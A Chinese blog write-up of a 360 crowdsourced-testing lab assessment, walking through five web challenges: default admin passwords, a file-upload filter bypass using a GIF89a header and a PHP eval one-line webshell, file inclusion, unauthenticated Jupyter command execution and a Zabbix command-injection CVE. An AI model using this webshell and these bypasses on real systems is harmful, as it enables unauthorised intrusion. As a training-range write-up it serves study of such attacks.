记一次360众测靶场考核
记一次360靶场考核
第一轮理论题
百度搜答案即可= =
第二轮实战考核
第一题 拆旧有限公司
打开环境是一个公司官网
随便点了点没发现什么东西
别慌
扫一下目录,看看能不能扫到后台或者敏感路径之类的突破口
果然,直接扫到了后台
尝试了一下弱密码admin/admin888
成功登录
发现是一个备份文件后台
通过抓包修改备份文件内容和文件名
这里尝试上传一句话
成功连接shell
第二题 图书馆公共网络存储网盘
打开环境是一个登录页面
发现它有一个”非注册用户上传文件“的功能
经过测试发现检测了文件头
,
所以这里用GIF89a
来绕过文件头检测,
再次上传一句话时,发现还过滤了<?
,
决定用\<script\>
标签php一句话木马来绕过<?
的过滤。
<script language="php">
@eval($_POST['shell']);
</script>
但怎么都不解析PHP
没有思路的时候,重新看了一遍上传功能
!!!!!突然发现
URL中存在文件包含
成功拿下
第三题
上传绕过方法与第二题一致就不过多叙述
第四题 WEB应用管理
jupyter的未授权访问远程命令执行
漏洞编号:SSV-99338
漏洞描述:管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞
,游客可在其中创建一个console
并执行任意Python代码和命令
。
执行系统命令
ovyan@1904042cf343:~$vyan@1904042cf343:~$ ls ../../
bin boot dev etc home KEY_10b6e8259961.txt lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
jovyan@1904042cf343:~$ cat /KEY_10b6e8259961.txt
mozhe7addd24523b82e0e371b5f7c7dg
第五题 智谷运维管理系统
漏洞编号:CVE-2020-11800
Zabbix Server的trapper命令处理,
存在命令注入漏洞
,可导致远程代码执行
。
弱口令登录后台admin/Zabbix
拿下
附:
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET Core 托管堆内存泄露/CPU异常的常见思路
· PostgreSQL 和 SQL Server 在统计信息维护中的关键差异
· C++代码改造为UTF-8编码问题的总结
· DeepSeek 解答了困扰我五年的技术问题
· 为什么说在企业级应用开发中,后端往往是效率杀手?
· 清华大学推出第四讲使用 DeepSeek + DeepResearch 让科研像聊天一样简单!
· 推荐几款开源且免费的 .NET MAUI 组件库
· 实操Deepseek接入个人知识库
· 易语言 —— 开山篇
· Trae初体验